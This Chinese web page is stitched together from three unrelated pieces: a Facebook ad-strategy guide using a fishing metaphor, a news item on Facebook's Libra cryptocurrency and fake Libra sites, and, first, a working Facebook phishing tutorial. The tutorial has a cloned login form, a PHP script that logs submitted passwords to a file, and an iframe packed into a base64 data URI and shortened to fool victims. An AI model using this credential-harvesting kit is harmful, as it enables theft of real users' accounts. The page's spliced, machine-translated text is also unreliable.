利用iframe"钓鱼秒懂FB广告逻辑

facebook钓鱼号

该博客以网络钓鱼窃取Facebook登录帐户为例,说明了网络钓鱼的基本步骤。该过程非常简单,主要包括两个步骤,制作一个网络钓鱼页面和一个网络钓鱼URI,其他站点的网络钓鱼页面也可以采取类似的方法,只需联系网络钓鱼即可。作为方法参考,使用iframe URI网络钓鱼入侵电子邮件或Facebook密码

一、制作钓鱼页面 以网络钓鱼窃取Facebook登录帐户为例,它包含三个文件,index.html,login.php,password.txt

第一步:制作 index.html 登陆页面

首先,打开https://www.facebook.com页面,查看源代码,然后将源代码复制到index.html文件中

然后,编辑index.html文件并找到

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"> 
将操作的值更改为
action=login.php?"https://www.facebook.com/login.php?login_attempt=1" 

(login.php用于窃取登录帐户密码)

将index.html放在Web目录中(我的文件放在/ Library / WebServer / Documents / facebook目录中)

步骤2:制作脚本来窃取Facebook帐户和密码 login.php

<?php header ('Location: https://www.facebook.com ');//跳转到真实的facebook页面 $handle = fopen("password.txt", "a");//将假页面中提交的POST数据写入password.txt文件中 foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "===============\r\n"); fclose($handle); exit; ?> 
第3步:创建一个可接收POST数据的password.txt文件
dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook dani-2:facebook leedani$ sudo touch password.txt dani-2:facebook leedani$ sudo chmod a+w password.txt 
第四步:测试

登录http://本地主机/ facebook /

输入电子邮件和密码,单击登录

查看password.txt文件

dani-2:facebook leedani$ cat password.txt 

请参阅,电子邮件和密码字段是Facebook登录帐户和密码。
二、制作钓鱼URI

通常,网络钓鱼将使用iframe用网络钓鱼页面覆盖原始页面以进行网络钓鱼。下一步操作是使用此函数生成Data:URI并将URI转换为短地址

步骤1:生成攻击代码

src是您存储网络钓鱼网页的地址

<style> body {margin:0; overflow:hidden;}</style> <iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe> 
步骤2:将攻击代码转换为数据:URI 登录http://dopiaza.org/tools/datauri/index.php,将上面的代码粘贴到其中,

对应数据:URI

data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+ 
更改数据:文本/普通数据:数据上方的URI:文本/ html
data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+ 
访问修改后的数据URI,我们可以看到 单击facebook图标,或下面的URL链接(浏览facebook.com),将跳至第一步中创建的facebook的虚假登录页面http:// localhost / facebook / 步骤3:生成与数据相对应的短地址:URI 显然,此URI太长,将引起怀疑。在实际环境中,我们可以首先转换短URL,例如,http://tinyurl.com/提供了此服务 最后,受害者很想点击将连接到网络钓鱼网页的URI来窃取帐户密码。
参考:

http://www.hackingdivs.in/hack-email-or-facebook-password-using-iframe-uri-phishing/

感谢 碳基体 MM的投递:)

每个人都听说使用Facebook制作海上广告特别有效,但是当我开始时,我不知道如何操作平台和优化广告。当我们回到中国时,我们总是听到每个人的反馈,即我们的Facebook交付机制太复杂,无法上手。今天,我想用一个简单的钓鱼故事来说明FB广告的逻辑,以便每个人都可以轻松玩Facebook,小白开始投放666。

最近在 <国家地理> 看Monster Fish,竟然悟到许多FB广告的道理。钓鱼有三个关键点 - 用什么鱼饵,用什么钓杆,在哪里钓鱼。想钓什么鱼,就要用这鱼爱吃的鱼饵;想钓野生鲑鱼,在池塘里可钓不到;想钓大鱼,你要选质量好并且柔韧的鱼竿。

这三个关键点与FB有什么关系? ·广告创意如诱饵创意将被订购,以吸引食客 ·受众就像钓鱼场,只有找到合适的受众才能准确投放 ·广告的目的和格式就像钓鱼竿,只有正确的目的才能产生想要的效果

使用最合适的(钓鱼竿)广告目的和格式

作为电子商务,说您不在乎单个数量是错误的。 Facebook有这么多的广告目的,哪一个最能激发潜在客户下订单?如果您在自己的独立网站中安装了FB像素,那么毫无疑问,转换量广告将是您的最佳选择。 FB后台算法将首先根据您销售的产品和既定受众来找到最有可能在广大人群中下订单的客户。

但是,如果您尚未安装像素,那么最有效的方法就是将尽可能多的潜在用户带到您的在线商店,以吸引网站流量。

设置广告目的后,接下来要考虑的是广告格式。 Facebook照片,轮播和视频广告都是更适合转化的广告。例如,企业可以使用轮播广告在一系列产品中展示一系列不同的产品或同一产品的不同用途。

埃及最大的电子商务公司B.Tech在黑色星期五期间使用轮播广告来促进其促销活动,与去年的购买量相比增长了2倍,广告支出的回报率也提高了50%。

与最合适的(本地)受众群体一起设置

Facebook每月有20亿活跃用户等待我们发展。我应该怎么做才能使20亿用户可用?认识自己,彼此了解并赢得战斗,我们需要先了解用户的购物历史,然后才能在适当的时间和地点影响他(她)。

用户的购物过程包含两个简单的部分:对FB的操作以及离开FB后在网站上的操作。

Facebook 过去,用户将与您的FB / Instagram帖子互动或观看您的视频。这些用户将比其他用户更愿意购买您的产品。您可以使用Facebook的自定义受众群体工具将广告仅推向该人群。 此外,您还可以根据观看视频的时长找到具有较高品牌忠诚度的人。例如,看过视频的人中有95%的人显然比只看5%的人更想了解您的产品。使用自定义受众群体轻松找到合适的人。

用户离开Facebook会怎样?这就需要使用Facebook优化的上方剑像素像素。在网站上安装像素后,它可以跟踪所有网站访问,添加到购物车以及购买操作。它还可以找到在该网站上停留了很长时间的人,甚至可以找到访问该网站但没有购买的用户(还有这样的操作!)。

使用最合适的(鱼饵)广告创意

Facebook上每月有20亿活跃用户,就像被宠坏的猫一样。他们每天都观看具有高端氛围和国际品牌的大型电影,然后观看由幻灯片制作的材料。那么,我们如何才能脱颖而出,并让客户对您的品牌和产品采取行动?关键是用最合适的想法吸引客户。

视频不仅是一种主流形式,而且是一种必要形式。根据研究,互联网用户的注意力只有7秒钟,而您的困难任务是阻止他。如果您是用户,则在Facebook上看到的都是与朋友共享的短片,但是当您看到静态照片广告时,您认为该用户会感兴趣吗?

有人会说,制作一部视频有多昂贵!但是资源是有限的,创造力是无限的!只要您愿意花时间思考一些有趣的想法,即使您没有最昂贵的设备,也可以提出非常好的想法。 Inspiralized用手机和应用程序(回旋镖)拍了一段有趣的视频。与静态广告相比,广告费用下降了11倍,点击次数则增加了48倍。

记住钓鱼诱饵(创意),钓鱼地点(观众),钓鱼竿(广告目标/形式),您可以轻松出海!

到目前为止,在24小时内,许多国内媒体报道称Facebook在其季度报告中强调“由于合规性障碍,天秤座可能永远不会被释放”。根据奇点金融的调查,该报告夸大了风险和“所有权方”。

一些国内媒体强调,Facebook在提交给美国证券交易委员会(SEC)的季度报告中提醒投资者,尽管它计划在2020年推出加密货币天秤座,但仍有许多因素可能会阻止天秤座如期推出,并可能甚至导致天秤座永远不会出来。

Facebook确实在其季度报告中提到了这一点,但其内容在报告的“风险因素”部分中,其中针对Libra的风险提示只是数十个风险提示之一。而且我们知道,财务报告中的风险提示需要用来解释最差的发展结果。因此,Facebook这次的披露不能作为进一步挫败该公司计划的依据。

Singularity Finance发现,该国内报告来自美国媒体CNBC的报告“ Facebook警告投资者,天秤座数字货币可能永远不会消失”,CNBC季度报告显示,Facebook向媒体发送了一份声明:

“天秤座已经受到多个司法管辖区的政府和监管机构的严格审查,并且预计这种审查将继续进行……Facebook认识到与监管机构,政策制定者和专家的合作对于天秤座的成功至关重要,因此该公司将与所有有关方面以公开的方式进行。”

根据Singularity Finance先前报道的文章《天秤座的第一次听力的意外情况的综合分析》,天秤座负责人David Bracus数次表示:“除非完全解决监管问题,否则我们将不会启动天秤座。我们还认识到,对于Calibra钱包而言,信任至关重要。“显然,Libra推出的最大障碍是合规性,这在Libra的期望之内。将其纳入风险预警是正常的。 ,不能用作天秤座计划的基础。

但是,最近的报告也引起了人们的注意。 《华盛顿邮报》 7月22日报道说,有十多个非官方的宣传帐户和团体甚至在Facebook和Instagram等平台上出售了天秤座。网络钓鱼网站。

根据天秤座的官方白皮书,天秤座的官方地址为“ libra.org”,其钱包Calibra的网站地址为“ https://calibra.com/”。提醒读者仔细识别访问的URL是否正确。

Data source: Libra

目前,Facebook已删除了相关帐户,但一些非官方网站仍向公众开放,例如“ https://www.buylibracoins.com/”。网站上漂亮的图形和内容可能会误导用户,并建立了注册帐户,购买天秤座和其他功能均涉嫌仿冒网站。

数据来源:Buylibracoin(非官方)

在这方面,参议院银行委员会民主党参议员马克·华纳说:“这是另一个强烈的信号,表明Facebook应该非常谨慎地对待天秤座,并承诺在美国监管机构担心之前不会发布任何产品。解决。 “可以看出,伪造URL的潜在风险以及用户可能遭受的损失将直接影响天秤座的促销计划。

天秤座和监管合作是其落地的唯一途径。但是,信任问题,操作风险,技术开发和其他问题仍然需要大量时间来克服。可以说,现实世界带来的障碍就在眼前。天秤座代表的技术变革的潜力不可阻挡。看到Facebook如何一一回应,Singularity Finance将继续为您报告。

(作者:奇点财经SFL,来自链的内容太开放,内容平台“太太多”;文章仅代表作者的意见,并不代表链的官方立场)

推荐阅读

tags

最新发布